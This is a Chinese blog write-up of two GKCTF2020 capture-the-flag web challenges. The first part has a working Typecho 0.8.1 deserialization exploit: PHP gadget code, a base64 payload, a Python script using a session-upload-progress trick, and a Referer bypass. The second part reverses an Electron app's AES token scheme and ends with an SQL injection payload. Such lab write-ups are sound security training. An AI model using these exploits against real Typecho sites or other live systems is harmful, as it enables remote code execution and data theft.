[GKCTF2020]web后边两道题(接上)

最新推荐文章于 2023-10-18 16:37:36 发布
最新推荐文章于 2023-10-18 16:37:36 发布
阅读量739 收藏
点赞数
分类专栏: ctf-wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/106479151
版权

EzTypecho

有一个附件可以下载,是网站的源码

打开网站是一个Typecho网站的安装页面

果断搜索漏洞,之前可以考虑看下信息,发现changlog.txt文件中有版本信息-0.8.1

然后上网搜索Typecho漏洞,发现了两个反序列化漏洞,Typecho反序列化漏洞导致前台getshellTypecho反序列化漏洞复现分析,想研究清楚可以去原文看,这里就讲利用,我们这里的版本是满足两个漏洞的,然后都可以用一个exp生成payload,我们这里使用下面的poc生成payload

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}

class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct(){
        $this->_params['screenName'] = 'system("cat /flag");';
        $this->_filter[0] = 'assert';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjIwOiJzeXN0ZW0oImNhdCAvZmxhZyIpOyI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjIwOiJzeXN0ZW0oImNhdCAvZmxhZyIpOyI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

然后这里还需要绕过限制条件进行访问

两个漏洞公共的限制条件

文章中有说需要finish,但是这题并不需要

这里有个referer检测,绕过方法,加上referer字段,内容就是url

referer: http://5f9ebdd9-c2f2-4f43-a362-1fbda863deb8.node3.buuoj.cn

然后就是两个漏洞分别的限制条件了,先看第一个漏洞

这里比官方漏洞多了个session的判断,需要绕过,然而前面的session_start();被注释掉了,所以需要找漏洞绕过,然后最前面还有个finish的get判断,然后下面是官方题解给的办法

得知在文件上传时POST⼀个与PHP_SESSION_UPLOAD_PROGRESS同名变量时会在session中添加数据,从而绕过session检测
使用下面的exp打过去 
import requests

url = 'http://5f9ebdd9-c2f2-4f43-a362-1fbda863deb8.node3.buuoj.cn/install.php'
files = {'file': 123}
headers = {
    'cookie':'PHPSESSID=test;__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6 IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi 4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhv ciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYX JhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJjYXQgL2ZsYWciO31zOjI0OiIAVHlw ZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19fXM6NjoicH JlZml4IjtzOjQ6InRlc3QiO30=',
    'Referer': 'http://5f9ebdd9-c2f2-4f43-a362-1fbda863deb8.node3.buuoj.cn/install.php'
    }
re = requests.post(url, files=files, headers=headers, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"})
print(re.text)
 

再看第二个漏洞

只检测了start是否有get传参,这个是比较简单的,直接get传参加前面的referer就完了

Node-Exe

hint:程序为electron程序

贴一下官方wp涨涨姿势

通过安装之后寻找源文件,或者对可执行文件binwalk,也可发现其中有7zip格式的文件,可以解压缩获得源文件,故此过程不再赘述。

安装后执行程序,填写靶机地址后,用户名密码为admin直接进入。

点击购买后,两个按钮都是没有用的假flag,故题目flag一定是无法购买的final  flag。

通过抓包发现,请求除了包含基本的请求体,还有一个token。每次token请求均不同,且更改请求体后token失效,请求也无法重放,所以推断出token必然是以一定规则在本地生成的。

找到程序所在目录,确认程序为electron程序后,不难得知网页文件均打包于.\resources\app.asar下。用node的asar工具解包:

asar extract ./app.asar ./ext/

便可得到webpack网站的源文件,查看package.json,发现页面是基于vue构建的,同时也发现了库crypto和js-md5。所以即使js源文件被webpack,也可以通过搜索methods关键词找到token生成函数的位置,同时推测token加密使用了md5和另一种加密方式。

此处的methods中包含了“encrypt”,“makeToken”等关键词,定位到此处应为token生成位置,单独提出对代码进行格式化,得到加密函数:

不难看出,加密使用了aes加密,转到调用函数寻找key和iv

makeToken: function(e) {
               var i = this;
               return c()(a.a.mark((function t() {
                   var o, r;
                   return a.a.wrap((function(t) {
                       for (;;) switch (t.prev = t.next) {
                       case 0:
                           return "31169fedc9a20ecf",
                           "d96adeefaa0102a9",
                           o = f()(n()(e)),
                           t.next = 5,
                           i.encrypt("31169fedc9a20ecf", "d96adeefaa0102a9", o);
                       case 5:
                           return r = t.sent,
                           t.abrupt("return", r);
                       case 7:
                       case "end":
                           return t.stop()
                       }
                   }), t, i)
               })))()
           },

可以得知加密使用的key和iv,但传入加密函数的并非传入生成函数的参数e,而是经过f和n函数处理得到的结果o,所以依然需要寻找函数f和函数n。但此时已经可以根据获得的key和iv对token进行初步解密了。解密后是一串长度为32的字符,基本可以推断这是一些信息的md5加密结果。回到renderer.js,格式化整个文档后,module结构如下:

module.exports = function(e){...}([function(e){}...]);

这一格式为js的IIFE函数,这种函数在定义处便执行,其中的变量不可从外部访问。我们从他的定义函数中寻找未知的函数n

此函数实现的js引擎中的stringify基础功能的一部分,用于解析字符串。结合请求体,可推断处调用的函数为toString(),不过此处并不重要,我们先前已经得知使用了md5加密。

接下来分析请求函数:

buyFlag: function(e) {
               var i = this;
               return c()(a.a.mark((function t() {
                   var o;
                   return a.a.wrap((function(t) {
                       for (;;) switch (t.prev = t.next) {
                       case 0:
                           return o = {
                               id: e,
                               timestamp: Date.parse(new Date)
                           },
                           t.t0 = i.$http,
                           t.t1 = i.url + "/buyflag",
                           t.t2 = o,
                           t.next = 6,
                           i.makeToken(o);
                       case 6:
                           t.t3 = t.sent,
                           t.t4 = {
                               token: t.t3
                           },
                           t.t5 = {
                               headers: t.t4
                           },
                           t.t6 = function(e) {
                               i.$Modal.info({
                                   title: "购买结果",
                                   content: e.data[0].flag
                               })
                           },
                           t.t0.post.call(t.t0, t.t1, t.t2, t.t5).then(t.t6);
                       case 11:
                       case "end":
                           return t.stop()
                       }
                   }), t, i)
               })))()

对照得知,传入makeToken函数的是请求体。至此审计结束,得到了token是由MD5

加密过的带timestamp的请求体后使用aes加密得到,之后便可自行发起请求。

根据返回的前两个flag的id分别为1和2,尝试获取id为3的flag时会提示无法购买,此时

通过构建payload注入即可获得flag。

payload:

1"or(id=3)#

 

0ne_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GKCTF 2020(web)
weixin_43610673的博客
05-25 621
菜逼只能赛后复现 CheckIN Base64后即可rec,可以读文件,但不知道flag文件位置 看一下phpinfo 命令执行的函数都给ban完了 用蚁剑链接?Ginkgo=ZXZhbCgkX1BPU1RbY21kXSk7 连接成功之后根目录有readflag,和flag 那就是要执行readflag文件 PHP 7.0-7.3 disable_functions bypasss 直接打 改一下命令就行 Exp要传到/tmp 目录 别的没权限 页面去包含执行 老八小超市儿 和这个基本差不多
[GKCTF2020]web
臭nana的博客
05-26 1063
CheckIN 打开目得到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$t
GKCTF2020-前三道web-wp
A_dmin的博客
05-24 994
GKCTF2020-web 上个网课,作业多的一批,周末都还有课,真的服!!! [GKCTF2020]CheckIN 打开目得到源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct()
window.webpackJsonp
顺其自然~专栏
09-15 3808
说白了,第一部分的意思就是:如果window.webpackJsonp为空,就声明window.webpackJsonp为一个数组变量;第一部分理解了,第二部分就容易了,就是push参数。}],乍一看push,应该是push(a, b)这种形式,或许这些代码是前端开发故意为之,不让其他用户那么容易的理解其目的,其实前端代码再怎么混淆加密都只是时间长短而已,重要的是后端,何必呢。工作中需要查看一些网站的JS语句,打心眼里对这种语法充满了鄙夷,优雅跟它没关系,一些烂写法很难读懂,简直就是反人类,太变态了。
JS逆向之Webpack 处理2
之度的博客
05-22 3096
本文参考链接:webpack逆向-中远海运-油猴中文网 这个难点在于入口函数调用库是从两个文件中调用的。 首先把入口函数扣出来 其中o.a,o=n("MuMZ"),全局搜索"MuMZ",如下: 其中包含一个var r = n("XBrZ");全局搜索"XBrZ",再另一个js文件中,并且用r这个扣调用函数,并且调用的比较多,搜索发现都在这个js文件中,将整个这个js文件拷贝下来。 接下来扣入口函数: 先复制入口函数: !function(c) { ...
webpackJsonp 同一个html 中重复定义, 导致报错
u014105739的博客
10-31 1055
webpackJsonp 同一个html 中重复定义, 导致页面报错
JS安全防护算法与逆向分析——webpack改写方案
LYY的学习和记录
05-15 2266
webpack改写方案 XHR断点 我们发现要扣的代码特别多,而且循环嵌套,会引用其他包,需要的代码太多了,有八万多行。最外边是一个括号包含webpack,是一个数组,压入了许多数据。但是这些文件都是直接被压入的,里边导入的包没有运行。 (window.webpackJsonp = window.webpackJsonp || []).push([[2], { "+Wzn": function(l, t, n) { "use strict"; n.d(t.
2023CNSS——WEB解(持续更新)
最新发布
m0_74317362的博客
10-18 287
进来看到按钮点击不了,想到去修改代码,要“检查“,但这里的右键和F12都不可用还好还有其他方法选用一种后进入检查页面删掉这里的disabled即可点击后得到flag。
ZooKeeper 38 道面试及答案.docx
07-07
ZooKeeper 38 道面试及答案 ZooKeeper 是一个开源的分布式协调服务,提供了文件系统、通知机制等功能,旨在帮助分布式应用程序实现一致性服务。 ZooKeeper 的目标是封装好复杂易出错的关键服务,将简单易用的接口...
JavaScript 60道面试及答案.docx
07-07
JavaScript 面试知识点总结 本文总结了 JavaScript 面试中的知识点,包括 HTTP 协议状态码、XMLHttpRequest 对象的 readyState、sessionStorage 和 localStorage、Ajax 的 GET 和 POST 方式、GC 机制、闭包、...
webpack-uber-alles:在 ctfeds 上介绍 webpack
07-09
Webpack Uber Alles 演示文稿。 安装 npm install -g bower webpack make install 在本地运行 webpack-dev-server 部署 make build; make push; make deploy
中科软金融保险部Java笔试
08-31
中科软金融保险部Java笔试
typecho cms 利用工具
07-30
typecho cms漏洞利用工具可以直接getshell 功能强大使用方便
Typecho v0.80 build 2010.8.15.gz
07-10
Typecho基于PHP5开发,支持多种数据库,是一款内核强健﹑扩展方便﹑体验友好﹑运行流畅的轻量级开源博客程序。选用Typecho,搭建独一无二个人网络日志发布平台,享受创作的快乐。 经过了一个漫长的beta期,typecho0.8正式跟大家见面,跟beta版相比,release版没有增加新的功能,而是修正了一些由热心网友发现的bug,增加了一些插件接口
中科软java面试
11-22
java面试1逻辑,很多都是给出几个数,然后找规律添空缺的数 2简答,什么是javabean;(2)编程,用递归方法实现什么功能 (3)数据库,基本的sql语句 ,Jdo是什么?  JDO(Java Data Object )是Java对象持久化的新的规范,也是一个用于存取某种数据仓库中的对象的标准化API。  四种会话跟踪技术?  3 1+2+3+4+...+100做成函数
ZooKeeper 28 道面试及答案.docx
07-07
ZooKeeper 面试及答案 title: ZooKeeper 面试及答案 ZooKeeper 是一个开放源码的分布式协调服务,它是集群的管理者,监视着集群中各个节点的状态根据节点提交的反馈进行下一步合理操作。最终,将简单易用的...
【网络安全】webpack下加密方法提取思路
yyyyyybw的博客
09-14 670
对比三种提取思路,利用webpack的结构特性进行脚本构造其过程较其他两者更简单,只需要复制加载器和加密模块代码,引用其他文件就可调用加密方法。
JS逆向 webpack解密
lmttlw的博客
11-18 3665
JS webpack解密 ,这个网站很坑,那个验证字段搜不到,XHR断点也断不到,就很奇怪,不过竟然我敢写这篇文章,就代表我是过了的。
一文学会Webpack实用功能|加载器篇
xuzhijia1991的博客
01-05 4131
Webpack 资源模块加载 通过探索我们知道可以把css文件作为打包的入口,不过webpack的打包入口一般还是JavaScript, 因为他的打包入口从某种程度来说可以算是我们应用的运行入口。 而就目前而言,前端应用当中的业务是由JavaScript去驱动的,我们只是尝试一下,正确的做法还是把js文件作为打包的入口。然后在js代码当中通过import的方式去引入css文件。 这样的话css-loader仍然可以正常工作,我们再来尝试一下。我们在js中import我们的css文件 import creat
左连接后边的where
10-18
举个例子,假设有两个表 A 和 B,它们的结构如下: 表 A: id name 1 Alice 2 Bob 3 Charlie 表 B: id age 1 20 3 25 如果我们执行以下 SQL 语句: SELECT A.name, B.age FROM A LEFT JOIN B ON A.id = B.id ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值